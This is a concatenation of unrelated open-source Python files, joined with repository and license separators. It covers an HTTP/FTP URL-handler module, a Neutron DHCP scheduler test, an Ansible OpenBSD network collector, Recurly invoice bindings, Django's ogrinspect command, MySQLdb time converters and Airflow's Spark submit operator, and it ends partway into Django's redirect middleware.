"""Return an addinfourl object for the request, using http_class.
http_class must implement the HTTPConnection API from httplib.
The addinfourl return value is a file-like object. It also
has methods and attributes including:
- info(): return a mimetools.Message object for the headers
- geturl(): return the original request URL
- code: HTTP status code
"""
host_port = req.get_host()
if not host_port:
raise URLError('no host given')
try:
h = http_class(host_port, timeout=req.timeout)
except TypeError:
# Python < 2.6, no per-connection timeout support
h = http_class(host_port)
h.set_debuglevel(self._debuglevel)
headers = dict(req.headers)
headers.update(req.unredirected_hdrs)
# We want to make an HTTP/1.1 request, but the addinfourl
# class isn't prepared to deal with a persistent connection.
# It will try to read all remaining data from the socket,
# which will block while the server waits for the next request.
# So make sure the connection gets closed after the (only)
# request.
headers["Connection"] = "close"
headers = dict(
(name.title(), val) for name, val in headers.items())
if req._tunnel_host:
if not hasattr(h, "set_tunnel"):
if not hasattr(h, "_set_tunnel"):
raise URLError("HTTPS through proxy not supported "
"(Python >= 2.6.4 required)")
else:
# python 2.6
set_tunnel = h._set_tunnel
else:
set_tunnel = h.set_tunnel
set_tunnel(req._tunnel_host)
try:
h.request(req.get_method(), req.get_selector(), req.data, headers)
r = h.getresponse()
except socket.error, err: # XXX what error?
raise URLError(err)
# Pick apart the HTTPResponse object to get the addinfourl
# object initialized properly.
# Wrap the HTTPResponse object in socket's file object adapter
# for Windows. That adapter calls recv(), so delegate recv()
# to read(). This weird wrapping allows the returned object to
# have readline() and readlines() methods.
# XXX It might be better to extract the read buffering code
# out of socket._fileobject() and into a base class.
r.recv = r.read
fp = create_readline_wrapper(r)
resp = closeable_response(fp, r.msg, req.get_full_url(),
r.status, r.reason)
return resp
class HTTPHandler(AbstractHTTPHandler):
def http_open(self, req):
return self.do_open(httplib.HTTPConnection, req)
http_request = AbstractHTTPHandler.do_request_
if hasattr(httplib, 'HTTPS'):
class HTTPSConnectionFactory:
def __init__(self, key_file, cert_file):
self._key_file = key_file
self._cert_file = cert_file
def __call__(self, hostport):
return httplib.HTTPSConnection(
hostport,
key_file=self._key_file, cert_file=self._cert_file)
class HTTPSHandler(AbstractHTTPHandler):
def __init__(self, client_cert_manager=None):
AbstractHTTPHandler.__init__(self)
self.client_cert_manager = client_cert_manager
def https_open(self, req):
if self.client_cert_manager is not None:
key_file, cert_file = self.client_cert_manager.find_key_cert(
req.get_full_url())
conn_factory = HTTPSConnectionFactory(key_file, cert_file)
else:
conn_factory = httplib.HTTPSConnection
return self.do_open(conn_factory, req)
https_request = AbstractHTTPHandler.do_request_
class HTTPCookieProcessor(BaseHandler):
"""Handle HTTP cookies.
Public attributes:
cookiejar: CookieJar instance
"""
def __init__(self, cookiejar=None):
if cookiejar is None:
cookiejar = CookieJar()
self.cookiejar = cookiejar
def http_request(self, request):
self.cookiejar.add_cookie_header(request)
return request
def http_response(self, request, response):
self.cookiejar.extract_cookies(response, request)
return response
https_request = http_request
https_response = http_response
class UnknownHandler(BaseHandler):
def unknown_open(self, req):
type = req.get_type()
raise URLError('unknown url type: %s' % type)
def parse_keqv_list(l):
"""Parse list of key=value strings where keys are not duplicated."""
parsed = {}
for elt in l:
k, v = elt.split('=', 1)
if v[0] == '"' and v[-1] == '"':
v = v[1:-1]
parsed[k] = v
return parsed
def parse_http_list(s):
"""Parse lists as described by RFC 2068 Section 2.
In particular, parse comma-separated lists where the elements of
the list may include quoted-strings. A quoted-string could
contain a comma. A non-quoted string could have quotes in the
middle. Neither commas nor quotes count if they are escaped.
Only double-quotes count, not single-quotes.
"""
res = []
part = ''
escape = quote = False
for cur in s:
if escape:
part += cur
escape = False
continue
if quote:
if cur == '\\':
escape = True
continue
elif cur == '"':
quote = False
part += cur
continue
if cur == ',':
res.append(part)
part = ''
continue
if cur == '"':
quote = True
part += cur
# append last part
if part:
res.append(part)
return [part.strip() for part in res]
class FileHandler(BaseHandler):
# Use local file or FTP depending on form of URL
def file_open(self, req):
url = req.get_selector()
if url[:2] == '//' and url[2:3] != '/':
req.type = 'ftp'
return self.parent.open(req)
else:
return self.open_local_file(req)
# names for the localhost
names = None
def get_names(self):
if FileHandler.names is None:
try:
FileHandler.names = (socket.gethostbyname('localhost'),
socket.gethostbyname(socket.gethostname()))
except socket.gaierror:
FileHandler.names = (socket.gethostbyname('localhost'),)
return FileHandler.names
# not entirely sure what the rules are here
def open_local_file(self, req):
try:
import email.utils as emailutils
except ImportError:
# python 2.4
import email.Utils as emailutils
import mimetypes
host = req.get_host()
file = req.get_selector()
localfile = url2pathname(file)
try:
stats = os.stat(localfile)
size = stats.st_size
modified = emailutils.formatdate(stats.st_mtime, usegmt=True)
mtype = mimetypes.guess_type(file)[0]
headers = mimetools.Message(StringIO(
'Content-type: %s\nContent-length: %d\nLast-modified: %s\n' %
(mtype or 'text/plain', size, modified)))
if host:
host, port = splitport(host)
if not host or \
(not port and socket.gethostbyname(host) in self.get_names()):
return addinfourl(open(localfile, 'rb'),
headers, 'file:'+file)
except OSError, msg:
# urllib2 users shouldn't expect OSErrors coming from urlopen()
raise URLError(msg)
raise URLError('file not on local host')
class FTPHandler(BaseHandler):
def ftp_open(self, req):
import ftplib
import mimetypes
host = req.get_host()
if not host:
raise URLError('ftp error: no host given')
host, port = splitport(host)
if port is None:
port = ftplib.FTP_PORT
else:
port = int(port)
# username/password handling
user, host = splituser(host)
if user:
user, passwd = splitpasswd(user)
else:
passwd = None
host = unquote(host)
user = unquote(user or '')
passwd = unquote(passwd or '')
try:
host = socket.gethostbyname(host)
except socket.error, msg:
raise URLError(msg)
path, attrs = splitattr(req.get_selector())
dirs = path.split('/')
dirs = map(unquote, dirs)
dirs, file = dirs[:-1], dirs[-1]
if dirs and not dirs[0]:
dirs = dirs[1:]
try:
fw = self.connect_ftp(user, passwd, host, port, dirs, req.timeout)
type = file and 'I' or 'D'
for attr in attrs:
attr, value = splitvalue(attr)
if attr.lower() == 'type' and \
value in ('a', 'A', 'i', 'I', 'd', 'D'):
type = value.upper()
fp, retrlen = fw.retrfile(file, type)
headers = ""
mtype = mimetypes.guess_type(req.get_full_url())[0]
if mtype:
headers += "Content-type: %s\n" % mtype
if retrlen is not None and retrlen >= 0:
headers += "Content-length: %d\n" % retrlen
sf = StringIO(headers)
headers = mimetools.Message(sf)
return addinfourl(fp, headers, req.get_full_url())
except ftplib.all_errors, msg:
raise URLError, ('ftp error: %s' % msg), sys.exc_info()[2]
def connect_ftp(self, user, passwd, host, port, dirs, timeout):
try:
fw = ftpwrapper(user, passwd, host, port, dirs, timeout)
except TypeError:
# Python < 2.6, no per-connection timeout support
fw = ftpwrapper(user, passwd, host, port, dirs)
## fw.ftp.set_debuglevel(1)
return fw
class CacheFTPHandler(FTPHandler):
# XXX would be nice to have pluggable cache strategies
# XXX this stuff is definitely not thread safe
def __init__(self):
self.cache = {}
self.timeout = {}
self.soonest = 0
self.delay = 60
self.max_conns = 16
def setTimeout(self, t):
self.delay = t
def setMaxConns(self, m):
self.max_conns = m
def connect_ftp(self, user, passwd, host, port, dirs, timeout):
key = user, host, port, '/'.join(dirs), timeout
if key in self.cache:
self.timeout[key] = time.time() + self.delay
else:
self.cache[key] = ftpwrapper(user, passwd, host, port, dirs, timeout)
self.timeout[key] = time.time() + self.delay
self.check_cache()
return self.cache[key]
def check_cache(self):
# first check for old ones
t = time.time()
if self.soonest <= t:
for k, v in self.timeout.items():
if v < t:
self.cache[k].close()
del self.cache[k]
del self.timeout[k]
self.soonest = min(self.timeout.values())
# then check the size
if len(self.cache) == self.max_conns:
for k, v in self.timeout.items():
if v == self.soonest:
del self.cache[k]
del self.timeout[k]
break
self.soonest = min(self.timeout.values())
| agpl-3.0 |
rdo-management/neutron | neutron/tests/unit/test_dhcp_scheduler.py | 1 | 11269 | # Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import datetime
import mock
from oslo_utils import timeutils
import testscenarios
from neutron.common import constants
from neutron.common import topics
from neutron import context
from neutron.db import agents_db
from neutron.db import agentschedulers_db as sched_db
from neutron.db import models_v2
from neutron.extensions import dhcpagentscheduler
from neutron.scheduler import dhcp_agent_scheduler
from neutron.tests.unit import testlib_api
# Required to generate tests from scenarios. Not compatible with nose.
load_tests = testscenarios.load_tests_apply_scenarios
class TestDhcpSchedulerBaseTestCase(testlib_api.SqlTestCase):
def setUp(self):
super(TestDhcpSchedulerBaseTestCase, self).setUp()
self.ctx = context.get_admin_context()
self.network = {'id': 'foo_network_id'}
self.network_id = 'foo_network_id'
self._save_networks([self.network_id])
def _get_agents(self, hosts):
return [
agents_db.Agent(
binary='neutron-dhcp-agent',
host=host,
topic=topics.DHCP_AGENT,
configurations="",
agent_type=constants.AGENT_TYPE_DHCP,
created_at=timeutils.utcnow(),
started_at=timeutils.utcnow(),
heartbeat_timestamp=timeutils.utcnow())
for host in hosts
]
def _save_agents(self, agents):
for agent in agents:
with self.ctx.session.begin(subtransactions=True):
self.ctx.session.add(agent)
def _create_and_set_agents_down(self, hosts, down_agent_count=0):
dhcp_agents = self._get_agents(hosts)
# bring down the specified agents
for agent in dhcp_agents[:down_agent_count]:
old_time = agent['heartbeat_timestamp']
hour_old = old_time - datetime.timedelta(hours=1)
agent['heartbeat_timestamp'] = hour_old
agent['started_at'] = hour_old
self._save_agents(dhcp_agents)
return dhcp_agents
def _save_networks(self, networks):
for network_id in networks:
with self.ctx.session.begin(subtransactions=True):
self.ctx.session.add(models_v2.Network(id=network_id))
def _test_schedule_bind_network(self, agents, network_id):
scheduler = dhcp_agent_scheduler.ChanceScheduler()
scheduler._schedule_bind_network(self.ctx, agents, network_id)
results = self.ctx.session.query(
sched_db.NetworkDhcpAgentBinding).filter_by(
network_id=network_id).all()
self.assertEqual(len(agents), len(results))
for result in results:
self.assertEqual(network_id, result.network_id)
class TestDhcpScheduler(TestDhcpSchedulerBaseTestCase):
def test_schedule_bind_network_single_agent(self):
agents = self._create_and_set_agents_down(['host-a'])
self._test_schedule_bind_network(agents, self.network_id)
def test_schedule_bind_network_multi_agents(self):
agents = self._create_and_set_agents_down(['host-a', 'host-b'])
self._test_schedule_bind_network(agents, self.network_id)
def test_schedule_bind_network_multi_agent_fail_one(self):
agents = self._create_and_set_agents_down(['host-a'])
self._test_schedule_bind_network(agents, self.network_id)
with mock.patch.object(dhcp_agent_scheduler.LOG, 'info') as fake_log:
self._test_schedule_bind_network(agents, self.network_id)
self.assertEqual(1, fake_log.call_count)
class TestAutoScheduleNetworks(TestDhcpSchedulerBaseTestCase):
"""Unit test scenarios for ChanceScheduler.auto_schedule_networks.
network_present
Network is present or not
enable_dhcp
Dhcp is enabled or disabled in the subnet of the network
scheduled_already
Network is already scheduled to the agent or not
agent_down
Dhcp agent is down or alive
valid_host
If true, then an valid host is passed to schedule the network,
else an invalid host is passed.
"""
scenarios = [
('Network present',
dict(network_present=True,
enable_dhcp=True,
scheduled_already=False,
agent_down=False,
valid_host=True)),
('No network',
dict(network_present=False,
enable_dhcp=False,
scheduled_already=False,
agent_down=False,
valid_host=True)),
('Network already scheduled',
dict(network_present=True,
enable_dhcp=True,
scheduled_already=True,
agent_down=False,
valid_host=True)),
('Agent down',
dict(network_present=True,
enable_dhcp=True,
scheduled_already=False,
agent_down=False,
valid_host=True)),
('dhcp disabled',
dict(network_present=True,
enable_dhcp=False,
scheduled_already=False,
agent_down=False,
valid_host=False)),
('Invalid host',
dict(network_present=True,
enable_dhcp=True,
scheduled_already=False,
agent_down=False,
valid_host=False)),
]
def test_auto_schedule_network(self):
plugin = mock.MagicMock()
plugin.get_subnets.return_value = (
[{"network_id": self.network_id, "enable_dhcp": self.enable_dhcp}]
if self.network_present else [])
scheduler = dhcp_agent_scheduler.ChanceScheduler()
if self.network_present:
down_agent_count = 1 if self.agent_down else 0
agents = self._create_and_set_agents_down(
['host-a'], down_agent_count=down_agent_count)
if self.scheduled_already:
self._test_schedule_bind_network(agents, self.network_id)
expected_result = (self.network_present and self.enable_dhcp)
expected_hosted_agents = (1 if expected_result and
self.valid_host else 0)
host = "host-a" if self.valid_host else "host-b"
observed_ret_value = scheduler.auto_schedule_networks(
plugin, self.ctx, host)
self.assertEqual(expected_result, observed_ret_value)
hosted_agents = self.ctx.session.query(
sched_db.NetworkDhcpAgentBinding).all()
self.assertEqual(expected_hosted_agents, len(hosted_agents))
class TestNetworksFailover(TestDhcpSchedulerBaseTestCase,
sched_db.DhcpAgentSchedulerDbMixin):
def test_reschedule_network_from_down_agent(self):
agents = self._create_and_set_agents_down(['host-a', 'host-b'], 1)
self._test_schedule_bind_network([agents[0]], self.network_id)
self._save_networks(["foo-network-2"])
self._test_schedule_bind_network([agents[1]], "foo-network-2")
with contextlib.nested(
mock.patch.object(self, 'remove_network_from_dhcp_agent'),
mock.patch.object(self, 'schedule_network',
return_value=[agents[1]]),
mock.patch.object(self, 'get_network', create=True,
return_value={'id': self.network_id})
) as (rn, sch, getn):
notifier = mock.MagicMock()
self.agent_notifiers[constants.AGENT_TYPE_DHCP] = notifier
self.remove_networks_from_down_agents()
rn.assert_called_with(mock.ANY, agents[0].id, self.network_id)
sch.assert_called_with(mock.ANY, {'id': self.network_id})
notifier.network_added_to_agent.assert_called_with(
mock.ANY, self.network_id, agents[1].host)
def _test_failed_rescheduling(self, rn_side_effect=None):
agents = self._create_and_set_agents_down(['host-a'], 1)
self._test_schedule_bind_network([agents[0]], self.network_id)
with contextlib.nested(
mock.patch.object(
self, 'remove_network_from_dhcp_agent',
side_effect=rn_side_effect),
mock.patch.object(self, 'schedule_network',
return_value=None),
mock.patch.object(self, 'get_network', create=True,
return_value={'id': self.network_id})
) as (rn, sch, getn):
notifier = mock.MagicMock()
self.agent_notifiers[constants.AGENT_TYPE_DHCP] = notifier
self.remove_networks_from_down_agents()
rn.assert_called_with(mock.ANY, agents[0].id, self.network_id)
sch.assert_called_with(mock.ANY, {'id': self.network_id})
self.assertFalse(notifier.network_added_to_agent.called)
def test_reschedule_network_from_down_agent_failed(self):
self._test_failed_rescheduling()
def test_reschedule_network_from_down_agent_concurrent_removal(self):
self._test_failed_rescheduling(
rn_side_effect=dhcpagentscheduler.NetworkNotHostedByDhcpAgent(
network_id='foo', agent_id='bar'))
def test_filter_bindings(self):
bindings = [
sched_db.NetworkDhcpAgentBinding(network_id='foo1',
dhcp_agent={'id': 'id1'}),
sched_db.NetworkDhcpAgentBinding(network_id='foo2',
dhcp_agent={'id': 'id1'}),
sched_db.NetworkDhcpAgentBinding(network_id='foo3',
dhcp_agent={'id': 'id2'}),
sched_db.NetworkDhcpAgentBinding(network_id='foo4',
dhcp_agent={'id': 'id2'})]
with mock.patch.object(self, 'agent_starting_up',
side_effect=[True, False]):
res = [b for b in self._filter_bindings(None, bindings)]
# once per each agent id1 and id2
self.assertEqual(2, len(res))
res_ids = [b.network_id for b in res]
self.assertIn('foo3', res_ids)
self.assertIn('foo4', res_ids)
def test_remove_networks_from_down_agents_catches_all(self):
with contextlib.nested(
mock.patch.object(
self, 'remove_network_from_dhcp_agent',
side_effect=Exception("Unexpected exception!")),
mock.patch.object(
self, '_filter_bindings',
return_value=[sched_db.NetworkDhcpAgentBinding(
network_id='foo', dhcp_agent_id='bar')])
):
self.remove_networks_from_down_agents()
| apache-2.0 |
ptemplier/ansible | lib/ansible/module_utils/facts/network/openbsd.py | 232 | 1600 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils.facts.network.base import NetworkCollector
from ansible.module_utils.facts.network.generic_bsd import GenericBsdIfconfigNetwork
class OpenBSDNetwork(GenericBsdIfconfigNetwork):
"""
This is the OpenBSD Network Class.
It uses the GenericBsdIfconfigNetwork.
"""
platform = 'OpenBSD'
# OpenBSD 'ifconfig -a' does not have information about aliases
def get_interfaces_info(self, ifconfig_path, ifconfig_options='-aA'):
return super(OpenBSDNetwork, self).get_interfaces_info(ifconfig_path, ifconfig_options)
# Return macaddress instead of lladdr
def parse_lladdr_line(self, words, current_if, ips):
current_if['macaddress'] = words[1]
current_if['type'] = 'ether'
class OpenBSDNetworkCollector(NetworkCollector):
_fact_class = OpenBSDNetwork
_platform = 'OpenBSD'
| gpl-3.0 |
CptLemming/libsaas | libsaas/services/recurly/invoices.py | 4 | 2232 | from libsaas import http, parsers
from libsaas.services import base
from . import resource
def parse_passthrough(body, code, headers):
if not 200 <= code < 300:
raise http.HTTPError(body, code, headers)
return body
class InvoicesBase(resource.RecurlyResource):
path = 'invoices'
def update(self, *args, **kwargs):
raise base.MethodNotSupported()
def delete(self, *args, **kwargs):
raise base.MethodNotSupported()
class Invoices(InvoicesBase):
@base.apimethod
def get(self, state=None, cursor=None, per_page=None):
"""
Fetch all your invoices.
:var state: The state of invoices to return: "open", "collected",
"failed", or "past_due".
:vartype state: str
"""
params = base.get_params(('state', 'cursor', 'per_page'), locals())
request = http.Request('GET', self.get_url(), params)
return request, parsers.parse_xml
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
class Invoice(InvoicesBase):
def create(self, *args, **kwargs):
raise base.MethodNotSupported()
@base.apimethod
def get_pdf(self, language='en-US'):
"""
Fetch a PDF blob for the invoice.
:var language: The language for the invoice, defaults to "en-US'.
:vartype language: str
"""
self.require_item()
headers = {'Accept': 'application/pdf', 'Accept-Language': language}
request = http.Request('GET', self.get_url(), {}, headers)
return request, parse_passthrough
@base.apimethod
def mark_successful(self):
"""
Mark an invoice as paid successfully
"""
self.require_item()
url = '{0}/mark_successful'.format(self.get_url())
request = http.Request('PUT', url)
return request, parsers.parse_empty
@base.apimethod
def mark_failed(self):
"""
Mark an invoice as failed collection
"""
self.require_item()
url = '{0}/mark_failed'.format(self.get_url())
request = http.Request('PUT', url)
return request, parsers.parse_empty
class AccountInvoices(InvoicesBase):
pass
| mit |
mozilla/captain | vendor/lib/python/django/contrib/gis/management/commands/ogrinspect.py | 126 | 6065 | import os
from optparse import make_option
from django.contrib.gis import gdal
from django.core.management.base import LabelCommand, CommandError
def layer_option(option, opt, value, parser):
"""
Callback for `make_option` for the `ogrinspect` `layer_key`
keyword option which may be an integer or a string.
"""
try:
dest = int(value)
except ValueError:
dest = value
setattr(parser.values, option.dest, dest)
def list_option(option, opt, value, parser):
"""
Callback for `make_option` for `ogrinspect` keywords that require
a string list. If the string is 'True'/'true' then the option
value will be a boolean instead.
"""
if value.lower() == 'true':
dest = True
else:
dest = [s for s in value.split(',')]
setattr(parser.values, option.dest, dest)
class Command(LabelCommand):
help = ('Inspects the given OGR-compatible data source (e.g., a shapefile) and outputs\n'
'a GeoDjango model with the given model name. For example:\n'
' ./manage.py ogrinspect zipcode.shp Zipcode')
args = '[data_source] [model_name]'
option_list = LabelCommand.option_list + (
make_option('--blank', dest='blank', type='string', action='callback',
callback=list_option, default=False,
help='Use a comma separated list of OGR field names to add '
'the `blank=True` option to the field definition. Set with'
'`true` to apply to all applicable fields.'),
make_option('--decimal', dest='decimal', type='string', action='callback',
callback=list_option, default=False,
help='Use a comma separated list of OGR float fields to '
'generate `DecimalField` instead of the default '
'`FloatField`. Set to `true` to apply to all OGR float fields.'),
make_option('--geom-name', dest='geom_name', type='string', default='geom',
help='Specifies the model name for the Geometry Field '
'(defaults to `geom`)'),
make_option('--layer', dest='layer_key', type='string', action='callback',
callback=layer_option, default=0,
help='The key for specifying which layer in the OGR data '
'source to use. Defaults to 0 (the first layer). May be '
'an integer or a string identifier for the layer.'),
make_option('--multi-geom', action='store_true', dest='multi_geom', default=False,
help='Treat the geometry in the data source as a geometry collection.'),
make_option('--name-field', dest='name_field',
help='Specifies a field name to return for the `__unicode__` function.'),
make_option('--no-imports', action='store_false', dest='imports', default=True,
help='Do not include `from django.contrib.gis.db import models` '
'statement.'),
make_option('--null', dest='null', type='string', action='callback',
callback=list_option, default=False,
help='Use a comma separated list of OGR field names to add '
'the `null=True` option to the field definition. Set with'
'`true` to apply to all applicable fields.'),
make_option('--srid', dest='srid',
help='The SRID to use for the Geometry Field. If it can be '
'determined, the SRID of the data source is used.'),
make_option('--mapping', action='store_true', dest='mapping',
help='Generate mapping dictionary for use with `LayerMapping`.')
)
requires_model_validation = False
def handle(self, *args, **options):
try:
data_source, model_name = args
except ValueError:
raise CommandError('Invalid arguments, must provide: %s' % self.args)
if not gdal.HAS_GDAL:
raise CommandError('GDAL is required to inspect geospatial data sources.')
# Removing options with `None` values.
options = dict([(k, v) for k, v in options.items() if not v is None])
# Getting the OGR DataSource from the string parameter.
try:
ds = gdal.DataSource(data_source)
except gdal.OGRException as msg:
raise CommandError(msg)
# Whether the user wants to generate the LayerMapping dictionary as well.
show_mapping = options.pop('mapping', False)
# Getting rid of settings that `_ogrinspect` doesn't like.
verbosity = options.pop('verbosity', False)
settings = options.pop('settings', False)
# Returning the output of ogrinspect with the given arguments
# and options.
from django.contrib.gis.utils.ogrinspect import _ogrinspect, mapping
output = [s for s in _ogrinspect(ds, model_name, **options)]
if show_mapping:
# Constructing the keyword arguments for `mapping`, and
# calling it on the data source.
kwargs = {'geom_name' : options['geom_name'],
'layer_key' : options['layer_key'],
'multi_geom' : options['multi_geom'],
}
mapping_dict = mapping(ds, **kwargs)
# This extra legwork is so that the dictionary definition comes
# out in the same order as the fields in the model definition.
rev_mapping = dict([(v, k) for k, v in mapping_dict.items()])
output.extend(['', '# Auto-generated `LayerMapping` dictionary for %s model' % model_name,
'%s_mapping = {' % model_name.lower()])
output.extend([" '%s' : '%s'," % (rev_mapping[ogr_fld], ogr_fld) for ogr_fld in ds[options['layer_key']].fields])
output.extend([" '%s' : '%s'," % (options['geom_name'], mapping_dict[options['geom_name']]), '}'])
return '\n'.join(output) + '\n'
| mpl-2.0 |
cparawhore/ProyectoSubastas | site-packages/MySQLdb/times.py | 76 | 3488 | """times module
This module provides some Date and Time classes for dealing with MySQL data.
Use Python datetime module to handle date and time columns."""
import math
from time import localtime
from datetime import date, datetime, time, timedelta
from _mysql import string_literal
Date = date
Time = time
TimeDelta = timedelta
Timestamp = datetime
DateTimeDeltaType = timedelta
DateTimeType = datetime
def DateFromTicks(ticks):
"""Convert UNIX ticks into a date instance."""
return date(*localtime(ticks)[:3])
def TimeFromTicks(ticks):
"""Convert UNIX ticks into a time instance."""
return time(*localtime(ticks)[3:6])
def TimestampFromTicks(ticks):
"""Convert UNIX ticks into a datetime instance."""
return datetime(*localtime(ticks)[:6])
format_TIME = format_DATE = str
def format_TIMEDELTA(v):
seconds = int(v.seconds) % 60
minutes = int(v.seconds / 60) % 60
hours = int(v.seconds / 3600) % 24
return '%d %d:%d:%d' % (v.days, hours, minutes, seconds)
def format_TIMESTAMP(d):
return d.isoformat(" ")
def DateTime_or_None(s):
if ' ' in s:
sep = ' '
elif 'T' in s:
sep = 'T'
else:
return Date_or_None(s)
try:
d, t = s.split(sep, 1)
if '.' in t:
t, ms = t.split('.',1)
ms = ms.ljust(6, '0')
else:
ms = 0
return datetime(*[ int(x) for x in d.split('-')+t.split(':')+[ms] ])
except (SystemExit, KeyboardInterrupt):
raise
except:
return Date_or_None(s)
def TimeDelta_or_None(s):
try:
h, m, s = s.split(':')
if '.' in s:
s, ms = s.split('.')
ms = ms.ljust(6, '0')
else:
ms = 0
h, m, s, ms = int(h), int(m), int(s), int(ms)
td = timedelta(hours=abs(h), minutes=m, seconds=s,
microseconds=ms)
if h < 0:
return -td
else:
return td
except ValueError:
# unpacking or int/float conversion failed
return None
def Time_or_None(s):
try:
h, m, s = s.split(':')
if '.' in s:
s, ms = s.split('.')
ms = ms.ljust(6, '0')
else:
ms = 0
h, m, s, ms = int(h), int(m), int(s), int(ms)
return time(hour=h, minute=m, second=s,
microsecond=ms)
except ValueError:
return None
def Date_or_None(s):
try:
return date(*[ int(x) for x in s.split('-',2)])
except (SystemExit, KeyboardInterrupt):
raise
except:
return None
def DateTime2literal(d, c):
"""Format a DateTime object as an ISO timestamp."""
return string_literal(format_TIMESTAMP(d),c)
def DateTimeDelta2literal(d, c):
"""Format a DateTimeDelta object as a time."""
return string_literal(format_TIMEDELTA(d),c)
def mysql_timestamp_converter(s):
"""Convert a MySQL TIMESTAMP to a Timestamp object."""
# MySQL>4.1 returns TIMESTAMP in the same format as DATETIME
if s[4] == '-': return DateTime_or_None(s)
s = s + "0"*(14-len(s)) # padding
parts = map(int, filter(None, (s[:4],s[4:6],s[6:8],
s[8:10],s[10:12],s[12:14])))
try:
return Timestamp(*parts)
except (SystemExit, KeyboardInterrupt):
raise
except:
return None
| mit |
Tagar/incubator-airflow | airflow/contrib/operators/spark_submit_operator.py | 2 | 7012 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from airflow.contrib.hooks.spark_submit_hook import SparkSubmitHook
from airflow.models import BaseOperator
from airflow.settings import WEB_COLORS
from airflow.utils.decorators import apply_defaults
class SparkSubmitOperator(BaseOperator):
"""
This hook is a wrapper around the spark-submit binary to kick off a spark-submit job.
It requires that the "spark-submit" binary is in the PATH or the spark-home is set
in the extra on the connection.
:param application: The application that submitted as a job, either jar or py file.
:type application: str
:param conf: Arbitrary Spark configuration properties
:type conf: dict
:param conn_id: The connection id as configured in Airflow administration. When an
invalid connection_id is supplied, it will default to yarn.
:type conn_id: str
:param files: Upload additional files to the executor running the job, separated by a
comma. Files will be placed in the working directory of each executor.
For example, serialized objects.
:type files: str
:param py_files: Additional python files used by the job, can be .zip, .egg or .py.
:type py_files: str
:param jars: Submit additional jars to upload and place them in executor classpath.
:param driver_classpath: Additional, driver-specific, classpath settings.
:type driver_classpath: str
:type jars: str
:param java_class: the main class of the Java application
:type java_class: str
:param packages: Comma-separated list of maven coordinates of jars to include on the
driver and executor classpaths
:type packages: str
:param exclude_packages: Comma-separated list of maven coordinates of jars to exclude
while resolving the dependencies provided in 'packages'
:type exclude_packages: str
:param repositories: Comma-separated list of additional remote repositories to search
for the maven coordinates given with 'packages'
:type repositories: str
:param total_executor_cores: (Standalone & Mesos only) Total cores for all executors
(Default: all the available cores on the worker)
:type total_executor_cores: int
:param executor_cores: (Standalone & YARN only) Number of cores per executor
(Default: 2)
:type executor_cores: int
:param executor_memory: Memory per executor (e.g. 1000M, 2G) (Default: 1G)
:type executor_memory: str
:param driver_memory: Memory allocated to the driver (e.g. 1000M, 2G) (Default: 1G)
:type driver_memory: str
:param keytab: Full path to the file that contains the keytab
:type keytab: str
:param principal: The name of the kerberos principal used for keytab
:type principal: str
:param name: Name of the job (default airflow-spark)
:type name: str
:param num_executors: Number of executors to launch
:type num_executors: int
:param application_args: Arguments for the application being submitted
:type application_args: list
:param verbose: Whether to pass the verbose flag to spark-submit process for debugging
:type verbose: bool
"""
template_fields = ('_name', '_application_args', '_packages')
ui_color = WEB_COLORS['LIGHTORANGE']
@apply_defaults
def __init__(self,
application='',
conf=None,
conn_id='spark_default',
files=None,
py_files=None,
driver_classpath=None,
jars=None,
java_class=None,
packages=None,
exclude_packages=None,
repositories=None,
total_executor_cores=None,
executor_cores=None,
executor_memory=None,
driver_memory=None,
keytab=None,
principal=None,
name='airflow-spark',
num_executors=None,
application_args=None,
verbose=False,
*args,
**kwargs):
super(SparkSubmitOperator, self).__init__(*args, **kwargs)
self._application = application
self._conf = conf
self._files = files
self._py_files = py_files
self._driver_classpath = driver_classpath
self._jars = jars
self._java_class = java_class
self._packages = packages
self._exclude_packages = exclude_packages
self._repositories = repositories
self._total_executor_cores = total_executor_cores
self._executor_cores = executor_cores
self._executor_memory = executor_memory
self._driver_memory = driver_memory
self._keytab = keytab
self._principal = principal
self._name = name
self._num_executors = num_executors
self._application_args = application_args
self._verbose = verbose
self._hook = None
self._conn_id = conn_id
def execute(self, context):
"""
Call the SparkSubmitHook to run the provided spark job
"""
self._hook = SparkSubmitHook(
conf=self._conf,
conn_id=self._conn_id,
files=self._files,
py_files=self._py_files,
driver_classpath=self._driver_classpath,
jars=self._jars,
java_class=self._java_class,
packages=self._packages,
exclude_packages=self._exclude_packages,
repositories=self._repositories,
total_executor_cores=self._total_executor_cores,
executor_cores=self._executor_cores,
executor_memory=self._executor_memory,
driver_memory=self._driver_memory,
keytab=self._keytab,
principal=self._principal,
name=self._name,
num_executors=self._num_executors,
application_args=self._application_args,
verbose=self._verbose
)
self._hook.submit(self._application)
def on_kill(self):
self._hook.on_kill()
| apache-2.0 |
carlmw/oscar-wager | django/contrib/redirects/middleware.py | 447 | 1105 | from django.contrib.redirects.models import Redirect
from django import http
from django.conf import settings
class RedirectFallbackMiddleware(object):
def process_response(self, request, response):
if response.status_code != 404:
return response # No need to check for a redirect for non-404 responses.
